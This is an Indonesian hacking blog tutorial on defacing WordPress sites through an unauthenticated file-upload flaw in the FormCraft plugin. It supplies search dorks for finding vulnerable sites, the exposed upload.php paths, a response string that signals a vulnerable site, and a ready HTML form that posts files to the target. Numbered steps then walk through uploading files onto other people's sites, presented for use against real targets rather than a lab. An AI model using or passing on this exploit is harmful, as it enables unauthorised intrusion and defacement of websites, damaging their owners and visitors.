Deface metode WordPress FormCraft Plugins - SAZFHI Exploit

Deface metode WordPress FormCraft Plugins

Deface metode WordPress FormCraft Plugins
Deface metode WordPress FormCraft Plugins

SAZFHI E
xploit
- Yo what's up bro, Balik lagi dengan admin yg paling tamvan ini :v, di hari ini admin ingin nge share tutorial Deface metode Wordpress Plugins FormCraft nih, CMS Wordpress dengan sejuta bug di plugin nya, oke sok langsung aja ke pembahasan nya.

Bahan Bahan :

  • Only File type .txt / .jpg
  • Dork :
    - inurl:/wp-content/plugins/formcraft/
    - inurl:/wp-content//plugins/formcraft/file-upload/
    - inurl:/wp-content/plugins/formcraft/ site:.com
  • Exploit :
    - /wp-content/plugins/formcraft/file-upload/server/php/upload.php
    - /wp-content/plugins/formcraft/file-upload/server/content/upload.php
  • CSRF : Click Me Senpai
  • Atau kalian bisa pakai CSRF ini
    <form method="POST" action="http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>

Tutorial Deface Wordpress FormCraft Plugins :

  1. Langkah pertama kalian dorking dulu pakai dork yang admin kasih.
  2. Kalo kalian ketemu site yang ada tulisan {"failed":"No file found 2"} nya Maka website itu Vuln.
    Deface metode WordPress FormCraft Plugins
  3. Nah abis itu kalian buka CSRF nya. Trus Kalian isi kolom kolom yg disediain.
    *Kalo kalian pake script CSRF yang admin kasih, kalian edit dulu site.com nya pake site yang ingin kalian deface.
    Contoh :
    - Kolom 1 kalian isi target kalian
    - Kolom 2 kalian isi files[]
    - Langsung aja kalian klik SIMPAN
    Deface metode WordPress FormCraft Plugins
  4. Nah pada bagian choose file, kalian pilih file yg mau kalian upload, lalu pencet UPLOAD COK. disini admin bakal nge upload file.txt
    Deface metode WordPress FormCraft Plugins
  5. Nah jika berhasil ter upload maka akan muncul cara akses nya, tinggal kalian copy & paste di new tab.
    Deface metode WordPress FormCraft Plugins
  6. Dan taraaa file text nya pun terupload....
    Deface metode WordPress FormCraft Plugins
Oke segitu dulu tutorial yang admin berikan. Kalo kalian punya kritik dan saran silakan kalian komen dibawah.
See you next time :)
SAZFHI ID
SAZFHI ID Aku tidak akan melakukan sesuatu yang tidak harus dilakukan. Tapi, bila harus dilakukan maka akan segera kuselesaikan.

Tidak ada komentar untuk "Deface metode WordPress FormCraft Plugins"